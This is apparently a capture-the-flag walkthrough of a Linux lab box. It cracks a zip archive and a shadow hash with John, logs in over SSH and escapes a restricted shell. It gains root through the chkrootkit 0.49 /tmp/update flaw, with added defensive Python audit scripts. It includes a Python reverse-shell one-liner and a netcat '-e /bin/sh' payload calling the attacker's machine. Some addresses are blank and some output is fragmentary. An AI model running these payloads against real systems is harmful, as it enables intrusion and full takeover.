sudo nmap -p- -sS -sV 130 
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38
Service Info: Host:; OS: Linux; CPE: cpe:/o:linux:linux_kernel

First up, checking the root page on port 80 takes us to an index page containing a file called

Upon downloading the file we are asked for a password to open it. Kali comes pre-installed with a John utility called zip2john. We can use it to produce a hash of the archive which can then be cracked with John.

└─$ zip2john > hash
ver 2.0 efh 5455 efh 7875 PKZIP Encr: 2b chk, TS_chk, cmplen=668, decmplen=1807, crc=B3ACDAFE
ver 2.0 efh 5455 efh 7875 PKZIP Encr: 2b chk, TS_chk, cmplen=434, decmplen=1111, crc=E11EC139
ver 2.0 efh 5455 efh 7875 PKZIP Encr: 2b chk, TS_chk, cmplen=460, decmplen=829, crc=A1F81C08
ver 2.0 efh 5455 efh 7875 PKZIP Encr: 2b chk, TS_chk, cmplen=368, decmplen=669, crc=FF05389F
ver 2.0 efh 5455 efh 7875 PKZIP Encr: 2b chk, TS_chk, cmplen=140, decmplen=185, crc=DFB905CD
ver 1.0 efh 5455 efh 7875 PKZIP Encr: 2b chk, TS_chk, cmplen=45, decmplen=33, crc=D9C379A9
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

└─$ ls

We can then run John against the hash.

└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manuel (
1g 0:00:00:00 DONE (2021-09-09 05:12) 50.00g/s 204800p/s 204800c/s 204800C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed


We can then extract the contents of the archive. After doing so we extract the /etc/ folder.

Of these files, shadow is the most interesting.

We have password hashes for the root account and for the account ‘296640a3b825115a47b68fc44501c828’. I was unable to crack the root password with a wordlist, but after running unshadow I was able to crack the other account's hash.

└─$ john unshadowed.txt --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:12 0.02% (ETA: 19:25:07) 0g/s 340.4p/s 680.9c/s 680.9C/s newzealand..blue13
0g 0:00:00:20 0.04% (ETA: 19:14:39) 0g/s 343.0p/s 686.0c/s 686.0C/s bethan..bagpuss
server (296640a3b825115a47b68fc44501c828)
1g 0:00:03:08 0.63% (ETA: 13:41:37) 0.005317g/s 576.4p/s 667.0c/s 667.0C/s 222520..192522
1g 0:00:03:10 0.64% (ETA: 13:40:28) 0.005257g/s 577.3p/s 666.8c/s 666.8C/s sh3lby..sabong
Use the "--show" option to display all of the cracked passwords reliably
Session aborted
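As an added illustration of the unshadow step above (this is example code, not part of the original write-up), the script below reproduces what `unshadow` does, merging the password field of each passwd entry with the hash from the matching shadow entry, and then classifies each hash the way John reports it (algorithm and iteration count, the "Cost 1 (iteration count) is 5000" line). The passwd and shadow lines are constructed for this example and the hash strings are placeholders, not the hashes from the box; the only thing taken from the page is the account name.

```python
"""Added example: what unshadow(8) does, plus a per-account summary of hash
algorithm and cost. Sample passwd/shadow lines are constructed; the hash
strings are placeholders, not real hashes."""
import re

# Constructed sample input, fields as in passwd(5) and shadow(5).
PASSWD_LINES = [
    "root:x:0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin",
    "296640a3b825115a47b68fc44501c828:x:1000:1000::/home/296640a3b825115a47b68fc44501c828:/bin/rbash",
]
SHADOW_LINES = [
    "root:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:18450:0:99999:7:::",
    "daemon:*:18450:0:99999:7:::",
    "296640a3b825115a47b68fc44501c828:$6$rounds=5000$PLACEHOLDERSALT2$PLACEHOLDERHASH2:18450:0:99999:7:::",
]

# crypt(3) prefix -> (algorithm name, default iteration count when no rounds= is given)
CRYPT_PREFIXES = {
    "$1$": ("md5crypt", 1000),
    "$5$": ("sha256crypt", 5000),
    "$6$": ("sha512crypt", 5000),
    "$y$": ("yescrypt", None),
    "$2b$": ("bcrypt", None),
}


def unshadow(passwd_lines, shadow_lines):
    """Replace the 'x' password field of each passwd line with the hash from
    shadow. This is the merge that John's unshadow utility performs so that
    the hash and the account's shell/uid sit on one line."""
    hashes = {}
    for line in shadow_lines:
        fields = line.rstrip("\n").split(":")
        if len(fields) >= 2:
            hashes[fields[0]] = fields[1]
    merged = []
    for line in passwd_lines:
        fields = line.rstrip("\n").split(":")
        if len(fields) < 7:
            continue  # malformed entry, skip it
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


def describe_hash(hash_field):
    """Classify a shadow password field: (algorithm, rounds)."""
    if hash_field == "":
        return ("empty", None)
    if hash_field.startswith(("!", "*")):
        return ("locked", None)
    for prefix, (name, default_rounds) in CRYPT_PREFIXES.items():
        if hash_field.startswith(prefix):
            m = re.search(r"\$rounds=(\d+)\$", hash_field)
            rounds = int(m.group(1)) if m else default_rounds
            return (name, rounds)
    return ("unknown", None)


def crackable_accounts(passwd_lines, shadow_lines):
    """Return [(user, algorithm, rounds, shell)] for accounts whose shadow entry
    holds a real hash, i.e. the entries a wordlist attack can target and the
    ones a defender should review for weak passwords and low iteration counts."""
    out = []
    for line in unshadow(passwd_lines, shadow_lines):
        user, pw, _uid, _gid, _gecos, _home, shell = line.split(":")[:7]
        algo, rounds = describe_hash(pw)
        if algo not in ("empty", "locked", "unknown"):
            out.append((user, algo, rounds, shell))
    return out


if __name__ == "__main__":
    for user, algo, rounds, shell in crackable_accounts(PASSWD_LINES, SHADOW_LINES):
        print(f"{user}: {algo}, rounds={rounds}, shell={shell}")
```

Both sample accounts come out as sha512crypt with 5000 rounds, matching the cost John printed; the locked daemon account is skipped. On a real host the same check over the actual files tells you which accounts would be exposed if the shadow file leaked, as it did here via the zip on the web server.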
We now have the password: server. I was then able to log in over SSH with the username and password.
└─$ ssh 296640a3b825115a47b68fc44501c828@ -t "bash --noprofile"

296640a3b825115a47b68fc44501c828@'s password: server
bash: dircolors: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ id
uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)

When attempting to run a simple command such as cat we are given the error message -rbash: cat: command not found. The rbash prefix tells us we are in a restricted shell with a limited PATH.

We fix the $PATH with:

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/home$ export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games"
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/home$ echo $PATH
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/home$ cd 296640a3b825115a47b68fc44501c828/
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat local.txt 

With the PATH fixed we have a more usable shell. We can then run a Python reverse shell to open another connection, which should be more usable still.

/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'

Once in the new shell, export the PATH again so the usual commands are available.


After enumerating the machine for a while I was unable to find points of escalation. I then transferred over pspy64 and let it run.

chmod +x pspy64

Soon after running it we see a large number of entries for chkrootkit-0.49.

Searching for this version shows a local privilege escalation exploit affecting this version and below:

Chkrootkit 0.49 – Local Privilege Escalation. CVE-2014-0476, CVE-107710. Local exploit for the Linux platform.

Essentially, a vulnerable chkrootkit run executes the file /tmp/update if one exists. Because chkrootkit is scheduled as root here, we can create update as a reverse shell and, when it is executed, it should give us a root shell.
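From the defender's side, the condition that makes this escalation work is easy to check for. The script below is an added example, not part of the write-up or of chkrootkit: it reports whether the installed chkrootkit is at or below 0.49 and whether a file named update is present in the temp directory, with its owner and mode. The default paths and the `CHKROOTKIT_VERSION='0.49'` line that the script looks for are assumptions about a typical install; `build_demo_scenario` constructs a throw-away directory so the check can be exercised without touching a real system.

```python
"""Added example: audit for the chkrootkit <= 0.49 /tmp/update condition
(CVE-2014-0476). Paths and the version-line format are assumptions."""
import os
import re
import stat
import tempfile

AFFECTED_MAX_VERSION = (0, 49)  # CVE-2014-0476 was fixed in chkrootkit 0.50


def parse_chkrootkit_version(script_text):
    """Return (major, minor) from the chkrootkit shell script, or None.
    Assumes the script carries a line such as CHKROOTKIT_VERSION='0.49'."""
    m = re.search(r"CHKROOTKIT_VERSION=['\"]?(\d+)\.(\d+)", script_text)
    return (int(m.group(1)), int(m.group(2))) if m else None


def is_affected_version(version):
    return version is not None and version <= AFFECTED_MAX_VERSION


def check_update_hook(tmp_dir="/tmp", chkrootkit_script="/usr/sbin/chkrootkit"):
    """Return a list of finding strings; an empty list means nothing to report."""
    findings = []
    version = None
    if os.path.isfile(chkrootkit_script):
        with open(chkrootkit_script, errors="replace") as f:
            version = parse_chkrootkit_version(f.read())
        if is_affected_version(version):
            findings.append(
                f"chkrootkit {version[0]}.{version[1]} <= 0.49 (CVE-2014-0476)")
    update = os.path.join(tmp_dir, "update")
    if os.path.lexists(update):
        st = os.lstat(update)
        executable = bool(st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))
        findings.append(
            f"{update} exists (uid={st.st_uid}, mode={stat.filemode(st.st_mode)}, "
            f"executable={executable})")
        if st.st_uid != 0 and is_affected_version(version):
            findings.append(
                "non-root-owned update file would be run by a root chkrootkit scan: "
                "remove it and upgrade chkrootkit")
    return findings


def build_demo_scenario():
    """Construct a temp directory holding a fake chkrootkit script (version 0.49)
    and an executable 'update' file, purely so the check has something to find."""
    d = tempfile.mkdtemp(prefix="chkrootkit-demo-")
    script = os.path.join(d, "chkrootkit")
    with open(script, "w") as f:
        f.write("#!/bin/sh\nCHKROOTKIT_VERSION='0.49'\n")  # constructed
    update = os.path.join(d, "update")
    with open(update, "w") as f:
        f.write("#!/bin/sh\necho demo\n")  # constructed, harmless
    os.chmod(update, 0o755)
    return d, script


if __name__ == "__main__":
    for finding in check_update_hook(*build_demo_scenario()):
        print(finding)
```

Run with no arguments against a live host the function looks at /tmp and /usr/sbin/chkrootkit; in the demo it runs against the constructed directory and reports both the version and the executable update file. The fix is the one the findings state: upgrade past 0.49 and make sure nothing untrusted can leave an executable at that path.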

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ cat update
/usr/bin/nc 4444 -e /bin/sh
Make it executable:
chmod +x /tmp/update

Then open a netcat listener on the specified port and we should land a root shell.

But only after we start the binary in the user's home directory (the user has all permissions there):

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -la
total 60
drwxr-xr-x 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4096 Sep 9 06:04 .
drwxr-xr-x 3 root root 4096 Jun 27 2020 ..
lrwxrwxrwx 1 root root 9 Jul 7 2020 .bash_history -> /dev/null
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 220 Jun 27 2020 .bash_logout
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 3583 Jun 27 2020 .bashrc
-rwxr-xr-x 1 root root 17480 Jul 7 2020 honeypot.decoy
-rw------- 1 root root 1855 Jul 7 2020 honeypot.decoy.cpp

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy 

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:5

The AV Scan will be launched in a minute or less.


└─$ sudo nc -nlvp 4444 
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 35942
uid=0(root) gid=0(root) groups=0(root)
ls -la
total 36
drwx------ 3 root root 4096 Sep 9 05:07 .
drwxr-xr-x 18 root root 4096 Jul 12 2020 ..
lrwxrwxrwx 1 root root 9 Jul 7 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 2 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4096 Jul 30 2009 chkrootkit-0.49
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 33 Sep 9 05:08 proof.txt
-rw-r--r-- 1 root root 32 Aug 27 2020 root.txt
-rw-r--r-- 1 root root 137 Jul 7 2020
-rw-r--r-- 1 root root 66 Jul 7 2020 .selected_editor
cat proof.txt
if test -f "$FILE"; then
    echo "An AV scan will not be launched."

cat root
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.V4fwaR/crontab installed on Tue Jul 7 16:44:59 2020)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
# Edit this file to introduce tasks to be run by cron.
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# For more information see the manual pages of crontab(5) and cron(8)
# m h dom mon dow command
* * * * * /bin/bash /root/